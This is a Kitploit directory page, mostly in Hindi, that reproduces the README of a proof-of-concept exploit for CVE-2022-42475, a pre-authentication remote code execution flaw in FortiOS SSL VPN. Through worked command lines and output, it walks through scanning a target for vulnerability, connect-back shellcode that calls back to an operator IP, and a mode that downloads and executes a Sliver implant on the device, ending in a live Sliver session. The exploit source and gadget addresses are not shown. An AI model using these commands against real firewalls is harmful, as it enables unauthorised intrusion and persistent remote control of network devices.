Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
Log in
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2022-42475-POC — CVE-2022-42475 के लिए एक्सप्लॉइट, FortiOS SSL VPN में प्री-ऑथ RCE। वैलिडेशन, बेनाइन वेरिफिकेशन, और कनेक्ट-बैक शेलकोड तथा रिमोट एक्सेस के लिए एन्क्रिप्टेड बाइनरी स्टेजर के साथ पूर्ण एक्सप्लॉइटेशन का समर्थन करता है। | Kitploit
उपकरण/GitHubGitHub/arthurhendrich/cve-2022-42475-poc
भेद्यता विश्लेषणशोषणशेलकोडवेब सुरक्षापेनिट्रेशन टेस्टिंगरेड टीमिंगपेलोड डेवलपमेंट
GitHubarthurhendrich/cve-2022-42475-poc

CVE-2022-42475-POC

CVE-2022-42475 के लिए एक्सप्लॉइट, FortiOS SSL VPN में प्री-ऑथ RCE। वैलिडेशन, बेनाइन वेरिफिकेशन, और कनेक्ट-बैक शेलकोड तथा रिमोट एक्सेस के लिए एन्क्रिप्टेड बाइनरी स्टेजर के साथ पूर्ण एक्सप्लॉइटेशन का समर्थन करता है।

रिपॉजिटरी देखें
97 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2022-42475

पृष्ठभूमि

यह ब्लॉग पोस्ट के लिए एक्सप्लॉइट है: https://bishopfox.com/blog/exploit-cve-2022-42475

संशोधित संस्करण

एक्सप्लॉइट का यह संस्करण आपके, हैकर, द्वारा ROP गैजेट्स आदि के लिए आवश्यक मेमोरी पतों की आपूर्ति किए बिना काम नहीं करेगा। इस डेटा को निर्धारित करने का काम Bishop Fox के लिए गोपनीय और स्वामित्व वाला है और मैं इसे इस एक्सप्लॉइट के साथ प्रकाशित नहीं करूंगा (नहीं कर सकता)। मुझे विश्वास है कि आप समझ गए होंगे!

संचालन के तरीके

  • केवल मान्य करें, कोई एक्सप्लॉइट नहीं। निर्धारित करता है कि लक्ष्य असुरक्षित है या नहीं। कोई पेलोड नहीं, कोई शेलकोड नहीं।
  • एक्सप्लॉइट, लेकिन केवल सत्यापित करें। लक्ष्य की शोषणीयता सत्यापित करने के लिए हानिरहित कनेक्ट-बैक "पिंग" शेलकोड चलाएँ।
  • कनेक्ट-बैक बाइनरी स्टेजर के साथ एक्सप्लॉइट। शेलकोड एक्सप्लॉइट से वापस जुड़ता है, एक एन्क्रिप्टेड ऑपरेटर-प्रदत्त बाइनरी फ़ाइल (आमतौर पर https://gitub.com/BishopFox/Sliver) डाउनलोड करता है, बाइनरी को डिक्रिप्ट करता है, फिर execve(binary_file) कॉल करता है।

नोट: वर्तमान में "केवल मान्य करें" मोड FortiOS के सभी ज्ञात संस्करणों पर काम करता है। हालांकि, एक्सप्लॉइट केवल 100D हार्डवेयर पर FortiOS 6.0.4 के विरुद्ध काम करते हैं। मैं अब BF में काम नहीं करता और इसलिए विस्तारित एक्सप्लॉइट को प्रकाशित नहीं कर सकता जो लगभग 18k लक्ष्यों का समर्थन करता है।

आवश्यकताएँ

  • PyCrypto
  • pycryptodome
pip3 install PyCrypto
pip3 install pycryptodome

केवल मान्य करें

यह बग का शोषण करने का कोई प्रयास नहीं करेगा, बल्कि इसे क्रैश के रूप में ट्रिगर करता है (दूरस्थ SSL VPN डेमॉन स्वचालित रूप से और तुरंत पुनरारंभ होता है)। क्रैश का ह्यूरिस्टिक रूप से पता लगाया जाता है और ऑपरेटर को रिपोर्ट किया जाता है।

इसे -v मान्य फ़्लैग के साथ चलाएँ:

$ ./x.py -t 192.168.0.10 -p 8443 -v

    --[ CVE-2022-42475: FortiGate Remote Pre-auth RCE ]--
    --[ Bishop Fox Cosmos Team X                      ]--

[+] Running in validate-only mode. No RCE.
[>] Testing to see if target is vulnerable (may take 10 seconds)
[+] Target '192.168.0.10:8443' appears to be VULNERABLE

एक्सप्लॉइट, लेकिन सत्यापित करें (यह सुविधा वर्तमान में केवल 100D उपकरणों पर FortiOS 6.0.4 के लिए उपलब्ध है)

यह बग को ट्रिगर करेगा, एक ROP श्रृंखला तैनात करेगा, और शेलकोड पर कूद जाएगा। शेलकोड हानिरहित है और निम्नानुसार काम करता है:

  • एक्सप्लॉइट लक्ष्य से जुड़ता है और शेलकोड को निष्पादित करने के लिए वल्न को ट्रिगर करता है
  • शेलकोड ऑपरेटर के IP:पोर्ट पर वापस जुड़ता है
  • शेलकोड एक्सप्लॉइट को एक एकल "हैलो" बाइट भेजता है: 0xbf
  • एक्सप्लॉइट शेलकोड को एक छोटा एन्क्रिप्टेड परीक्षण पेलोड देता है (AES कुंजी प्रत्येक रन पर यादृच्छिक होती है)
  • शेलकोड पेलोड को डिक्रिप्ट करता है और FortiGate उपकरण पर /tmp/x पर सहेजता है
  • यदि पेलोड डिक्रिप्शन सफल रहा तो शेलकोड एक्सप्लॉइट को एक और एकल 0xbf बाइट भेजता है
  • एक्सप्लॉइट बाइट को पढ़ता है और कोड निष्पादन की पुष्टि करता है।

फ़्लैग:

-t           लक्ष्य होस्ट/IP
-p           लक्ष्य पोर्ट
-e           एक्सप्लॉइट मोड
-c           केवल कनेक्ट-बैक मोड
-H और -P     ऑपरेटर का IP:पोर्ट  (आवश्यक)
-s           FortiOS का सॉफ़्टवेयर संस्करण (आवश्यक)
-m           FortiOS चलाने वाला हार्डवेयर मॉडल
-d           डीबगिंग चालू करें

एक उदाहरण जहाँ हम सॉफ़्टवेयर संस्करण 6.0.4 और उपकरण मॉडल 100D दोनों चुनते हैं:

┌──(kali㉿kali)-[/mnt/hgfs/fortios/CVE-2022-42475]
└─$ sudo ./x.py -t 192.168.0.10 -p 8443 -e -c -H 192.168.0.99 -P 443 -s 6.0.4 -m 100D                   130 ⨯

    --[ CVE-2022-42475: FortiGate Remote Pre-auth RCE ]--
    --[ Bishop Fox Cosmos Team X                      ]--

[+] Generating random 128-bit AES key to encrypt payload
[+] Encrypting payload...
[+] Using cached shellcode. Edit ./x.py (look for 'shellcode.s') to force refresh.
[+] Configured for connect-back to 192.168.0.99:443
[+] Starting encrypted payload listener...
[+] Preparing for exploit...
[+] Sending request!
[+] Importing gadgets from 'exploit_data.json'
[<] Listener bound to port 443, waiting for connect-back...
[+] Validating gadgets...
[!] No functional hardware models were defined for FortiOS '5.2.14'. Removed.
[!] No functional hardware models were defined for FortiOS '5.6.9'. Removed.
[+] Imported 797 targets:
[-]   6.0.4     [  1 targets ]   <=== 100D
[-]   5.2.14    [ 47 targets ]
[-]   5.6.9     [ 60 targets ]
[-]   6.0.13    [ 68 targets ]
[-]   6.0.14    [ 67 targets ]
[-]   6.0.15    [ 58 targets ]
[-]   6.0.8     [ 67 targets ]
[-]   6.2.11    [ 69 targets ]
[-]   6.2.7     [ 75 targets ]
[-]   6.4.10    [ 71 targets ]
[-]   6.4.2     [ 62 targets ]
[-]   6.4.3     [ 61 targets ]
[-]   6.4.6     [ 73 targets ]
[-]   6.4.9     [ 72 targets ]
[-]   7.0.4     [ 53 targets ]
[+] Starting exploit
[<] Incoming request from 192.168.0.10:22470
[<] Received hello packet from target!! Model #: 100D
[<] Sending encrypted payload of 36 bytes
[<] Finished sending payload (36 bytes), waiting for response...
[<] Received the expected response ('100D') from 192.168.0.10
[<] Target is VULNERABLE with 100% confidence.
[+] All done!

यदि आप हार्डवेयर मॉडल चुनने के लिए -m को छोड़ देते हैं, तो एक्सप्लॉइट निर्दिष्ट सॉफ़्टवेयर संस्करण के लिए सभी हार्डवेयर लक्ष्यों को ब्रूट-फोर्स करेगा।

वैश्विक थर्मोन्यूक्लियर युद्ध

  • ऑपरेटर एक Sliver इम्प्लांट बाइनरी (Linux-आधारित) का स्थान निर्दिष्ट करता है
  • एक्सप्लॉइट लक्ष्य से जुड़ता है और शेलकोड को निष्पादित करने के लिए वल्न को ट्रिगर करता है
  • शेलकोड ऑपरेटर के IP:पोर्ट पर वापस जुड़ता है
  • शेलकोड एक्सप्लॉइट को एक एकल "हैलो" बाइट भेजता है: 0xbf
  • एक्सप्लॉइट Sliver बाइनरी को एन्क्रिप्ट करता है और इसे शेलकोड को भेजता है
  • शेलकोड बाइनरी को डिक्रिप्ट करता है और इसे /tmp/x पर सहेजता है
  • शेलकोड एक्सप्लॉइट को एक "सफलता" 0xbf बाइट भेजता है
  • एक्सप्लॉइट बाइट को पढ़ता है और कोड निष्पादन की पुष्टि करता है
  • शेलकोड execve("/tmp/x") कॉल करता है
  • ???
  • लाभ!

फ़्लैग:

-t           लक्ष्य होस्ट/IP
-p           लक्ष्य पोर्ट
-e           एक्सप्लॉइट मोड
-f filename  /path/to/binary/to/execve/on/target
-H और -P     कनेक्ट-बैक के लिए ऑपरेटर का IP:पोर्ट (आवश्यक)
-s           FortiOS का सॉफ़्टवेयर संस्करण (आवश्यक)
-m           FortiOS चलाने वाला हार्डवेयर मॉडल
-d           डीबगिंग चालू करें

Sliver:

carl@pluto:~$ ./sliver-server_linux

.------..------..------..------..------..------.
|S.--. ||L.--. ||I.--. ||V.--. ||E.--. ||R.--. |
| :/\: || :/\: || (\/) || :(): || (\/) || :(): |
| :\/: || (__) || :\/: || ()() || :\/: || ()() |
| '--'S|| '--'L|| '--'I|| '--'V|| '--'E|| '--'R|
`------'`------'`------'`------'`------'`------'

All hackers gain living weapon
[*] Server v1.5.34 - d2a6fa8cd6cc029818dd8d9e4a039bdea8071ca2
[*] Welcome to the sliver shell, please type 'help' for options

[server] sliver > mtls -l 8888

[*] Starting mTLS listener ...

[*] Successfully started job #1

एक्सप्लॉइट:

$ ./x.py -t 192.168.0.10 -p 8443 -e -f implant5 -H 192.168.0.99 -P 443 -s 6.0.4 -m 100D

    --[ CVE-2022-42475: FortiGate Remote Pre-auth RCE ]--
    --[ Bishop Fox Cosmos Team X                      ]--

[+] Exploit will attempt to execve("implant5") on the target
...
[<] Target is VULNERABLE with 100% confidence.
[+] All done.

और Sliver पर वापस:

[*] Session d8d5344b implant5 - 192.168.0.10:3500 (Burnet) - linux/amd64 - Mon, 06 Mar 2023 22:18:30 MST

[server] sliver > use d8d5344b-c666-4c60-9e33-5ce50eb82cad

[*] Active session implant5 (d8d5344b-c666-4c60-9e33-5ce50eb82cad)

[server] sliver (implant5) > whoami

Logon ID: <err>

[server] sliver (implant5) > ls
टूल डाउनलोड करें